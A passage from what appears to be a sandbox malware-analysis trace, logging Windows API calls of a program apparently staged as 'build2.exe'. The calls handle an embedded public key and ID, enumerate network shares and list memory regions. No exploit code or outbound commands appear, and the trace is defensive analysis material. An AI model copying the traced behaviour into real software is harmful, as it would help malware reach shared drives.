KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.596] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0111.597] lstrcpyA (in: lpString1=0xf3aab78, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.597] lstrcpyA (in: lpString1=0xf3aa778, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.597] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dbb0 [0111.597] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x854) returned 0x2b82048 [0111.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2b4dbb0, cbMultiByte=-1, lpWideCharStr=0x2b82048, cchWideChar=1066 | out: lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 43 [0111.597] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x860) returned 0x2b77388 [0111.597] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b82048 | out: hHeap=0x2a0000) returned 1 [0111.597] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dbb0 | out: hHeap=0x2a0000) returned 1 [0111.597] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.598] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b77388 | out: hHeap=0x2a0000) returned 1 [0111.598] lstrlenA (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 42 [0111.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x56) returned 0x2aaa200 [0111.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf3aa778, cbMultiByte=-1, lpWideCharStr=0x2aaa200, cchWideChar=43 | out: lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 43 [0111.598] lstrcpyW (in: lpString1=0x521cf0, lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0111.598] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0111.598] lstrlenW (lpString="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 40 [0111.615] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b75e88 | out: hHeap=0x2a0000) returned 1 Thread: id = 72 os_tid = 0xf0c Thread: id = 74 os_tid = 0xf18 [0112.611] timeGetTime () returned 0x13b17c9 [0112.611] GetLastError () returned 0x54f [0112.611] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3bc) returned 0x2b723a8 [0112.631] GetCurrentThreadId () returned 0xf18 [0112.631] SetLastError (dwErrCode=0x54f) [0112.631] Sleep (dwMilliseconds=0x1339e0) Thread: id = 75 os_tid = 0xf1c [0112.700] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x31afee0 | out: lphEnum=0x31afee0*=0x2b73850) returned 0x0 [0114.323] WNetEnumResourceW (in: hEnum=0x2b73850, lpcCount=0x31afedc, lpBuffer=0x2c0d990, lpBufferSize=0x31afed8 | out: lpcCount=0x31afedc, lpBuffer=0x2c0d990, lpBufferSize=0x31afed8) returned 0x0 [0114.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3020 [0114.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba31d0 [0114.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x70) returned 0x2af02a0 [0114.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3218 [0114.323] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3338 [0114.323] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2c0d990, lphEnum=0x31afe28 | out: lphEnum=0x31afe28*=0x2b15900) returned 0x0 [0114.384] WNetEnumResourceW (in: hEnum=0x2b15900, lpcCount=0x31afe24, lpBuffer=0x2c11998, lpBufferSize=0x31afe20 | out: lpcCount=0x31afe24, lpBuffer=0x2c11998, lpBufferSize=0x31afe20) returned 0x103 [0114.384] WNetCloseEnum (hEnum=0x2b15900) returned 0x0 [0114.384] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba31d0 | out: hHeap=0x2a0000) returned 1 [0114.385] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3020 | out: hHeap=0x2a0000) returned 1 [0114.385] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3020 [0114.385] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba31d0 [0114.385] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xe0) returned 0x2ac2b80 [0114.385] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3380 [0114.385] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba33c8 [0114.385] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3338 | out: hHeap=0x2a0000) returned 1 [0114.386] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ba3218 | out: hHeap=0x2a0000) returned 1 [0114.386] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2af02a0 | out: hHeap=0x2a0000) returned 1 [0114.386] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3218 [0114.388] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2ba3338 [0114.388] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2c0d9b0, lphEnum=0x31afe28) Process: id = "7" image_name = "build2.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" page_root = "0x43f77000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xee4" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1195 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1196 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1197 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1198 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1199 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1200 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1201 start_va = 0x400000 end_va = 0x47afff monitored = 1 entry_point = 0x40b990 region_type = mapped_file name = "build2.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe") Region: id = 1202 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1203 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1204 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1205 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1206 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1207 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1208 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1209 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1210 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1211 start_va = 0x480000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1212 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1213 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1214 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1215 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1216 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1217 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1218 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1219 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1220 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1221 start_va = 0x6f0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1222 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1223 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1224 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1225 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1226 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1227 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1228 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1229 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1230 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1231 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1232 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1233 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1234 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1235 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1236 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1237 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1238 start_va = 0x210000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1239 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1240 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1241 start_va = 0x670000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1242 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1243 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1244 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1245 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1246 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1247 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1248 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1249 start_va = 0x6f0000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1250 start_va = 0x8e0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 1251 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1269 start_va = 0x738c0000 end_va = 0x738c4fff monitored = 0 entry_point = 0x738c10f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 1270 start_va = 0x1de0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001de0000" filename = "" Region: id = 1271 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1272 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1273 start_va = 0x220000 end_va = 0x265fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1274 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1275 start_va = 0x2a0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1276 start_va = 0x1de0000 end_va = 0x1ebefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001de0000" filename = "" Region: id = 1277 start_va = 0x739b0000 end_va = 0x739c2fff monitored = 0 entry_point = 0x739b1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1278 start_va = 0x270000 end_va = 0x272fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1279 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Thread: id = 73 os_tid = 0xf14 [0110.942] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xa7421fa0, dwHighDateTime=0x1d8a8d3)) [0110.942] GetCurrentProcessId () returned 0xf10 [0110.942] GetCurrentThreadId () returned 0xf14 [0110.942] GetTickCount () returned 0x13b11e1 [0110.942] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff68 | out: lpPerformanceCount=0x18ff68*=2077009364807) returned 1 [0110.965] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\791a7d8c-ce1c-4b10-8bdd-9a6fed24ef19\\build2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0110.965] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x210000 [0110.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.966] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0110.966] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0110.966] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0110.966] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0110.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.967] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.967] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.967] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.967] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.967] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.967] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.967] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.968] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.968] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.968] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.968] GetProcAddress (hModule=0x752b0000, lpProcName="EncodePointer") returned 0x76f40fcb [0110.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0110.969] GetProcAddress (hModule=0x752b0000, lpProcName="DecodePointer") returned 0x76f39d35 [0110.969] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x238) returned 0x2107d0 [0110.969] GetModuleHandleW 